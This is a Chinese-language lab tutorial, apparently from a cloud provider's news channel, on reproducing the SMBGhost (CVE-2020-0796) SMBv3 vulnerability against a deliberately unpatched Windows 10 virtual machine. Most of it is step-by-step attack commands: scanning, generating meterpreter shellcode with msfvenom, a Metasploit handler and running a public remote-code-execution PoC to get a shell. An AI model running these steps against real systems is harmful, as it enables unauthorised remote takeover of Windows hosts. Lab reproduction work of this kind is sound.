您好,登錄后才能下訂單哦!
如何實現CVE-2020-0796漏洞復現,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
CVE-2020-0796是由于SMBv3協議在處理惡意的壓縮數據包時出錯所造成的;在解壓數據包的時候使用客戶端傳過來的長度進行解壓時,并沒有檢查長度是否合法,最終導致整數溢出。它可讓遠程且未經身份驗證的攻擊者在目標系統上執行任意代碼,該漏洞類似于永恒之藍。
漏洞危害等級:高
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
靶機:存在漏洞的win10虛擬機環境,系統鏡像:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
ip地址:192.168.117.150
安裝鏡像后的注意事項:
· 將windows10的防火墻關掉,使能互相ping通
· 將window10的自動更新關掉,避免漏洞被打補丁
檢測工具:
https://github.com/dickens88/cve-2020-0796-scanner
getshell代碼:
https://github.com/chompie1337/SMBGhost_RCE_PoC
攻擊機:kali
ip地址:192.168.117.132
1、先用檢測代碼對目標主機進行掃描,發現存在漏洞
python3 cve-2020-0796-scanner.py -t 192.168.117.150
2.使用msfvenom命令生成shellcode代碼
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
將生成的shellcode.txt中的代碼替換getshell代碼中exploit.py中的USER_PAYLOAD部分
3.開啟kali中的msf使用handler模塊開啟監聽
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset rhost 192.168.117.150set lport 3333run
4.運行修改好的漏洞利用代碼:
python3 exploit.py -ip 192.168.117.150
5.發現在msf控制臺成功獲得反彈shell
6.發現有亂碼,使用chcp 65001顯示正常
至此復現完成
· 修改后的源碼有些錯誤需要改
看完上述內容,你們掌握如何實現CVE-2020-0796漏洞復現的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。